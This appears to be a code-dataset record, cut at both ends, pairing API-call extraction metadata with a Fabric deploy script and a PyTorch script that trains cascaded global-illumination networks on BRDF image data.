'CASCADE'}), '(VariantAlleleCollectionSource, on_delete=CASCADE)\n', (25918, 25968), False, 'from django.db import models, IntegrityError\n'), ((25990, 26041), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantAllele'], {'on_delete': 'CASCADE'}), '(VariantAllele, on_delete=CASCADE)\n', (26007, 26041), False, 'from django.db import models, IntegrityError\n'), ((26619, 26661), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'CASCADE'}), '(User, on_delete=CASCADE)\n', (26636, 26661), False, 'from django.db import models, IntegrityError\n'), ((26682, 26732), 'django.db.models.ForeignKey', 'models.ForeignKey', (['AlleleSource'], {'on_delete': 'CASCADE'}), '(AlleleSource, on_delete=CASCADE)\n', (26699, 26732), False, 'from django.db import models, IntegrityError\n'), ((26755, 26823), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2)', 'choices': 'AlleleConversionTool.choices'}), '(max_length=2, choices=AlleleConversionTool.choices)\n', (26771, 26823), False, 'from django.db import models, IntegrityError\n'), ((26841, 26868), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (26857, 26868), False, 'from django.db import models, IntegrityError\n'), ((26895, 27005), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'null': '(True)', 'on_delete': 'CASCADE', 'related_name': '"""liftover_source_genome_build"""'}), "(GenomeBuild, null=True, on_delete=CASCADE, related_name=\n 'liftover_source_genome_build')\n", (26912, 27005), False, 'from django.db import models, IntegrityError\n'), ((27064, 27113), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'on_delete': 'CASCADE'}), '(GenomeBuild, on_delete=CASCADE)\n', (27081, 27113), False, 'from django.db import models, IntegrityError\n'), ((27796, 27842), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Liftover'], {'on_delete': 'CASCADE'}), '(Liftover, on_delete=CASCADE)\n', (27813, 27842), False, 'from django.db import models, IntegrityError\n'), ((27856, 27900), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'on_delete': 'CASCADE'}), '(Allele, on_delete=CASCADE)\n', (27873, 27900), False, 'from django.db import models, IntegrityError\n'), ((27915, 27971), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Variant'], {'null': '(True)', 'on_delete': 'CASCADE'}), '(Variant, null=True, on_delete=CASCADE)\n', (27932, 27971), False, 'from django.db import models, IntegrityError\n'), ((28034, 28052), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (28050, 28052), False, 'from django.db import models, IntegrityError\n'), ((2178, 2224), 'django.urls.base.reverse', 'reverse', (['"""view_allele"""'], {'kwargs': "{'pk': self.id}"}), "('view_allele', kwargs={'pk': self.id})\n", (2185, 2224), False, 'from django.urls.base import reverse\n'), ((2293, 2333), 'flags.models.models.FlagTypeContext.objects.get', 'FlagTypeContext.objects.get', ([], {'pk': '"""allele"""'}), "(pk='allele')\n", (2320, 2333), False, 'from flags.models.models import FlagsMixin, FlagTypeContext\n'), ((13651, 13713), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig__genomebuildcontig__genome_build': 'genome_build'}), '(locus__contig__genomebuildcontig__genome_build=genome_build)\n', (13652, 13713), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((14204, 14278), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig': 'contig', 'locus__position__lte': 'end', 'end_position__gte': 'start'}), '(locus__contig=contig, locus__position__lte=end, end_position__gte=start)\n', (14205, 14278), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((18905, 18972), 'django.urls.base.reverse', 'reverse', (['"""view_allele_from_variant"""'], {'kwargs': "{'variant_id': self.pk}"}), "('view_allele_from_variant', kwargs={'variant_id': self.pk})\n", (18912, 18972), False, 'from django.urls.base import reverse\n'), ((20799, 20828), 'library.genomics.format_chrom', 'format_chrom', (['chrom', 'want_chr'], {}), '(chrom, want_chr)\n', (20811, 20828), False, 'from library.genomics import format_chrom\n'), ((23471, 23522), 'django.db.models.query_utils.Q', 'Q', ([], {'variantcollectionrecord__variant_collection': 'self'}), '(variantcollectionrecord__variant_collection=self)\n', (23472, 23522), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((23817, 23873), 'django.db.models.query_utils.Q', 'Q', ([], {}), "(**{f'{self.variant_collection_alias}__isnull': False})\n", (23818, 23873), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((5613, 5657), 'genes.hgvs.get_hgvs_variant_tuple', 'get_hgvs_variant_tuple', (['g_hgvs', 'genome_build'], {}), '(g_hgvs, genome_build)\n', (5635, 5657), False, 'from genes.hgvs import get_hgvs_variant_tuple\n'), ((11583, 11603), 'library.utils.md5sum_str', 'md5sum_str', (['self.seq'], {}), '(self.seq)\n', (11593, 11603), False, 'from library.utils import md5sum_str\n'), ((12217, 12247), 're.match', 're.match', (['"""[^GATCN]"""', 'self.seq'], {}), "('[^GATCN]', self.seq)\n", (12225, 12247), False, 'import re\n'), ((13432, 13468), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig__name__iexact': 'chrom'}), '(locus__contig__name__iexact=chrom)\n', (13433, 13468), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((13471, 13512), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig__ucsc_name__iexact': 'chrom'}), '(locus__contig__ucsc_name__iexact=chrom)\n', (13472, 13512), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((13779, 13812), 'django.db.models.query_utils.Q', 'Q', ([], {'alt__seq': 'Variant.REFERENCE_ALT'}), '(alt__seq=Variant.REFERENCE_ALT)\n', (13780, 13812), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((14054, 14099), 'django.db.models.functions.Greatest', 'Greatest', (['"""locus__ref__length"""', '"""alt__length"""'], {}), "('locus__ref__length', 'alt__length')\n", (14062, 14099), False, 'from django.db.models.functions import Greatest\n'), ((23570, 23638), 'django.db.models.query_utils.FilteredRelation', 'FilteredRelation', (['"""variantcollectionrecord"""'], {'condition': 'vcr_condition'}), "('variantcollectionrecord', condition=vcr_condition)\n", (23586, 23638), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((5280, 5369), 'snpdb.models.models_dbsnp.DbSNP.get_for_variant', 'DbSNP.get_for_variant', (['va.variant', 'va.genome_build.latest_variant_annotation_version'], {}), '(va.variant, va.genome_build.\n latest_variant_annotation_version)\n', (5301, 5369), False, 'from snpdb.models.models_dbsnp import DbSNP\n'), ((14146, 14166), 'django.db.models.F', 'F', (['"""locus__position"""'], {}), "('locus__position')\n", (14147, 14166), False, 'from django.db.models import Value as V, QuerySet, F\n'), ((14169, 14190), 'django.db.models.F', 'F', (['"""longest_sequence"""'], {}), "('longest_sequence')\n", (14170, 14190), False, 'from django.db.models import Value as V, QuerySet, F\n'), ((14550, 14556), 'django.db.models.Value', 'V', (['""":"""'], {}), "(':')\n", (14551, 14556), True, 'from django.db.models import Value as V, QuerySet, F\n'), ((14626, 14632), 'django.db.models.Value', 'V', (['""" """'], {}), "(' ')\n", (14627, 14632), True, 'from django.db.models import Value as V, QuerySet, F\n'), ((14702, 14708), 'django.db.models.Value', 'V', (['""">"""'], {}), "('>')\n", (14703, 14708), True, 'from django.db.models import Value as V, QuerySet, F\n'), ((16825, 16861), 'snpdb.models.models_genome.GenomeBuild.builds_with_annotation', 'GenomeBuild.builds_with_annotation', ([], {}), '()\n', (16859, 16861), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((2747, 2767), 'snpdb.models.models_genome.GenomeBuild.grch37', 'GenomeBuild.grch37', ([], {}), '()\n', (2765, 2767), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((2964, 2984), 'snpdb.models.models_genome.GenomeBuild.grch38', 'GenomeBuild.grch38', ([], {}), '()\n', (2982, 2984), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((14784, 14795), 'django.db.models.fields.TextField', 'TextField', ([], {}), '()\n', (14793, 14795), False, 'from django.db.models.fields import TextField\n'), ((8017, 8164), 'logging.warning', 'logging.warning', (['"""VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one"""', 'va.allele', 'va.genome_build', 'va.variant'], {}), "(\n 'VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one'\n , va.allele, va.genome_build, va.variant)\n", (8032, 8164), False, 'import logging\n'), ((9020, 9040), 'snpdb.models.models_genome.GenomeBuild.grch37', 'GenomeBuild.grch37', ([], {}), '()\n', (9038, 9040), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((9111, 9131), 'snpdb.models.models_genome.GenomeBuild.grch38', 'GenomeBuild.grch38', ([], {}), '()\n', (9129, 9131), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n')] |
from fabric.decorators import task
from fabric.operations import run, sudo, local
from ConfigParser import ConfigParser
import geospatial
from fabric.context_managers import lcd
cp = ConfigParser()
cp.read('ocgis.cfg')
if cp.get('install','location') == 'local':
run = local
cd = lcd
def lsudo(op):
local('sudo {0}'.format(op))
sudo = lsudo
SRC = cp.get('install','src')
INSTALL = cp.get('install','install')
J = cp.get('install','j')
@task(default=True)
def deploy():
# geospatial.install_hdf()
geospatial.install_netCDF4() | [
"ConfigParser.ConfigParser",
"geospatial.install_netCDF4",
"fabric.decorators.task"
] | [((184, 198), 'ConfigParser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (196, 198), False, 'from ConfigParser import ConfigParser\n'), ((464, 482), 'fabric.decorators.task', 'task', ([], {'default': '(True)'}), '(default=True)\n', (468, 482), False, 'from fabric.decorators import task\n'), ((531, 559), 'geospatial.install_netCDF4', 'geospatial.install_netCDF4', ([], {}), '()\n', (557, 559), False, 'import geospatial\n')] |
import torch
import numpy as np
from torch.autograd import Variable
import torch.optim as optim
import argparse
import random
import os
import models
import torchvision.utils as vutils
import utils
import dataLoader
from torch.utils.data import DataLoader
parser = argparse.ArgumentParser()
# The locationi of training set
parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images')
parser.add_argument('--experiment', default=None, help='the path to store samples and models')
# The basic training setting
parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training')
parser.add_argument('--batchSize', type=int, default=16, help='input batch size')
parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network')
# The training weight
parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2')
parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3')
# Fine Tune the network
parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not')
parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network')
# The detail network setting
parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades should we use')
opt = parser.parse_args()
print(opt)
assert(opt.cascadeLevel == 0 )
if opt.experiment is None:
opt.experiment = 'check_globalillumination'
os.system('mkdir {0}'.format(opt.experiment) )
os.system('cp *.py %s' % opt.experiment )
g2W, g3W = opt.globalIllu2, opt.globalIllu3
opt.gpuId = opt.deviceIds[0]
opt.seed = random.randint(1, 10000)
print("Random Seed: ", opt.seed)
random.seed(opt.seed)
torch.manual_seed(opt.seed)
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################
# initalize tensors
albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
# Global illumination
globIllu1to2 = models.globalIllumination()
globIllu2to3 = models.globalIllumination()
#########################################
if opt.isFineTune:
globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) )
globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) )
############## ######################
# Send things into GPU
if opt.cuda:
albedoBatch = albedoBatch.cuda(opt.gpuId)
normalBatch = normalBatch.cuda(opt.gpuId)
roughBatch = roughBatch.cuda(opt.gpuId)
depthBatch = depthBatch.cuda(opt.gpuId)
segBatch = segBatch.cuda(opt.gpuId)
imP1Batch = imP1Batch.cuda(opt.gpuId)
imP2Batch = imP2Batch.cuda(opt.gpuId)
imP3Batch = imP3Batch.cuda(opt.gpuId)
globIllu1to2 = globIllu1to2.cuda(opt.gpuId)
globIllu2to3 = globIllu2to3.cuda(opt.gpuId)
####################################
####################################
# Global Optimier
opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) )
opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) )
#####################################
####################################
brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize)
brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False)
j = 0
globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
for epoch in list(range(opt.epochId+1, opt.nepoch) ):
trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')
for i, dataBatch in enumerate(brdfLoader):
j += 1
# Load data from cpu to gpu
albedo_cpu = dataBatch['albedo']
albedoBatch.data.resize_(albedo_cpu.shape)
albedoBatch.data.copy_(albedo_cpu )
normal_cpu = dataBatch['normal']
normalBatch.data.resize_(normal_cpu.shape)
normalBatch.data.copy_(normal_cpu )
rough_cpu = dataBatch['rough']
roughBatch.data.resize_(rough_cpu.shape)
roughBatch.data.copy_(rough_cpu )
seg_cpu = dataBatch['seg']
segBatch.data.resize_(seg_cpu.shape)
segBatch.data.copy_(seg_cpu )
depth_cpu = dataBatch['depth']
depthBatch.data.resize_(depth_cpu.shape)
depthBatch.data.copy_(depth_cpu )
imP1_cpu = dataBatch['imP1']
imP1Batch.data.resize_(imP1_cpu.shape)
imP1Batch.data.copy_(imP1_cpu )
imP2_cpu = dataBatch['imP2']
imP2Batch.data.resize_(imP2_cpu.shape)
imP2Batch.data.copy_(imP2_cpu )
imP3_cpu = dataBatch['imP3']
imP3Batch.data.resize_(imP3_cpu.shape)
imP3Batch.data.copy_(imP3_cpu )
opGlobalIllu1to2.zero_grad()
opGlobalIllu2to3.zero_grad()
########################################################
# Build the cascade network architecture #
globalIllu2s = []
globalIllu3s = []
n = 0
inputGlob2 = torch.cat([imP1Batch, albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu2 = globIllu1to2(inputGlob2)
globalIllu2s.append(globalIllu2 )
inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu3 = globIllu2to3(inputGlob3.detach() )
globalIllu3s.append(globalIllu3)
########################################################
globalIllu2Errs = []
globalIllu3Errs = []
pixelNum = torch.sum(segBatch ).cpu().data.item()
for m in range(0, n + 1):
globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch)
* (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 )
globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch)
* (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 )
globalIllu2ErrSum = sum(globalIllu2Errs)
globalIllu3ErrSum = sum(globalIllu3Errs)
totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum
totalErr.backward()
opGlobalIllu1to2.step()
opGlobalIllu2to3.step()
# Output training error
utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j)
utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j)
utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)
utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)
globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0)
globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0)
if j < 1000:
utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j == 1000 or j% 2000 == 0:
# Save the ground truth and the input
vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data,
'{0}/{1}_albedoGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data,
'{0}/{1}_normalGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data,
'{0}/{1}_roughGt.png'.format(opt.experiment, j) )
depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch)
depthOut = (depthOut - 0.25) /0.8
vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data,
'{0}/{1}_depthGt.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP1.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP2.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP3.png'.format(opt.experiment, j) )
# Save the predicted results
for n in range(0, opt.cascadeLevel + 1):
vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) )
vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) )
trainingLog.close()
# Update the training rate
if (epoch + 1) % 2 == 0:
for param_group in opGlobalIllu1to2.param_groups:
param_group['lr'] /= 2
for param_group in opGlobalIllu2to3.param_groups:
param_group['lr'] /= 2
np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList )
np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList )
torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) )
torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )
| [
"random.randint",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"torch.manual_seed",
"torch.FloatTensor",
"os.system",
"numpy.ones",
"torch.cat",
"models.globalIllumination",
"utils.writeErrToFile",
"utils.turnErrorIntoNumpy",
"numpy.mean",
"random.seed",
"torch.cuda.is_available",
"torch.clamp",
"utils.writeErrToScreen",
"dataLoader.BatchLoader",
"torch.sum"
] | [((266, 291), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (289, 291), False, 'import argparse\n'), ((1842, 1882), 'os.system', 'os.system', (["('cp *.py %s' % opt.experiment)"], {}), "('cp *.py %s' % opt.experiment)\n", (1851, 1882), False, 'import os\n'), ((1970, 1994), 'random.randint', 'random.randint', (['(1)', '(10000)'], {}), '(1, 10000)\n', (1984, 1994), False, 'import random\n'), ((2028, 2049), 'random.seed', 'random.seed', (['opt.seed'], {}), '(opt.seed)\n', (2039, 2049), False, 'import random\n'), ((2050, 2077), 'torch.manual_seed', 'torch.manual_seed', (['opt.seed'], {}), '(opt.seed)\n', (2067, 2077), False, 'import torch\n'), ((3026, 3053), 'models.globalIllumination', 'models.globalIllumination', ([], {}), '()\n', (3051, 3053), False, 'import models\n'), ((3069, 3096), 'models.globalIllumination', 'models.globalIllumination', ([], {}), '()\n', (3094, 3096), False, 'import models\n'), ((4260, 4318), 'dataLoader.BatchLoader', 'dataLoader.BatchLoader', (['opt.dataRoot'], {'imSize': 'opt.imageSize'}), '(opt.dataRoot, imSize=opt.imageSize)\n', (4282, 4318), False, 'import dataLoader\n'), ((4334, 4413), 'torch.utils.data.DataLoader', 'DataLoader', (['brdfDataset'], {'batch_size': 'opt.batchSize', 'num_workers': '(8)', 'shuffle': '(False)'}), '(brdfDataset, batch_size=opt.batchSize, num_workers=8, shuffle=False)\n', (4344, 4413), False, 'from torch.utils.data import DataLoader\n'), ((4450, 4502), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4457, 4502), True, 'import numpy as np\n'), ((4528, 4580), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4535, 4580), True, 'import numpy as np\n'), ((4605, 4657), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4612, 4657), True, 'import numpy as np\n'), ((4680, 4732), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4687, 4732), True, 'import numpy as np\n'), ((2082, 2107), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2105, 2107), False, 'import torch\n'), ((2292, 2357), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2309, 2357), False, 'import torch\n'), ((2384, 2449), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2401, 2449), False, 'import torch\n'), ((2474, 2539), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(1)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 1, opt.imageSize, opt.imageSize)\n', (2491, 2539), False, 'import torch\n'), ((2562, 2627), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2579, 2627), False, 'import torch\n'), ((2652, 2717), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(1)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 1, opt.imageSize, opt.imageSize)\n', (2669, 2717), False, 'import torch\n'), ((2742, 2807), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2759, 2807), False, 'import torch\n'), ((2831, 2896), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2848, 2896), False, 'import torch\n'), ((2920, 2985), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2937, 2985), False, 'import torch\n'), ((6274, 6367), 'torch.cat', 'torch.cat', (['[imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch]'], {'dim': '(1)'}), '([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch,\n segBatch], dim=1)\n', (6283, 6367), False, 'import torch\n'), ((6486, 6585), 'torch.cat', 'torch.cat', (['[globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch]'], {'dim': '(1)'}), '([globalIllu2s[n], albedoBatch, normalBatch, roughBatch,\n depthBatch, segBatch], dim=1)\n', (6495, 6585), False, 'import torch\n'), ((7574, 7638), 'utils.writeErrToScreen', 'utils.writeErrToScreen', (['"""globalIllu2"""', 'globalIllu2Errs', 'epoch', 'j'], {}), "('globalIllu2', globalIllu2Errs, epoch, j)\n", (7596, 7638), False, 'import utils\n'), ((7647, 7711), 'utils.writeErrToScreen', 'utils.writeErrToScreen', (['"""globalIllu3"""', 'globalIllu3Errs', 'epoch', 'j'], {}), "('globalIllu3', globalIllu3Errs, epoch, j)\n", (7669, 7711), False, 'import utils\n'), ((7720, 7795), 'utils.writeErrToFile', 'utils.writeErrToFile', (['"""globalIllu2"""', 'globalIllu2Errs', 'trainingLog', 'epoch', 'j'], {}), "('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)\n", (7740, 7795), False, 'import utils\n'), ((7804, 7879), 'utils.writeErrToFile', 'utils.writeErrToFile', (['"""globalIllu3"""', 'globalIllu3Errs', 'trainingLog', 'epoch', 'j'], {}), "('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)\n", (7824, 7879), False, 'import utils\n'), ((7952, 7993), 'utils.turnErrorIntoNumpy', 'utils.turnErrorIntoNumpy', (['globalIllu2Errs'], {}), '(globalIllu2Errs)\n', (7976, 7993), False, 'import utils\n'), ((8076, 8117), 'utils.turnErrorIntoNumpy', 'utils.turnErrorIntoNumpy', (['globalIllu3Errs'], {}), '(globalIllu3Errs)\n', (8100, 8117), False, 'import utils\n'), ((8208, 8258), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[1:j + 1, :], axis=0)\n', (8215, 8258), True, 'import numpy as np\n'), ((8325, 8375), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[1:j + 1, :], axis=0)\n', (8332, 8375), True, 'import numpy as np\n'), ((8440, 8490), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[1:j + 1, :], axis=0)\n', (8447, 8490), True, 'import numpy as np\n'), ((8568, 8618), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[1:j + 1, :], axis=0)\n', (8575, 8618), True, 'import numpy as np\n'), ((8712, 8768), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[j - 999:j + 1, :], axis=0)\n', (8719, 8768), True, 'import numpy as np\n'), ((8833, 8889), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[j - 999:j + 1, :], axis=0)\n', (8840, 8889), True, 'import numpy as np\n'), ((8952, 9008), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[j - 999:j + 1, :], axis=0)\n', (8959, 9008), True, 'import numpy as np\n'), ((9084, 9140), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[j - 999:j + 1, :], axis=0)\n', (9091, 9140), True, 'import numpy as np\n'), ((9780, 9814), 'torch.clamp', 'torch.clamp', (['depthBatch', '(1e-06)', '(10)'], {}), '(depthBatch, 1e-06, 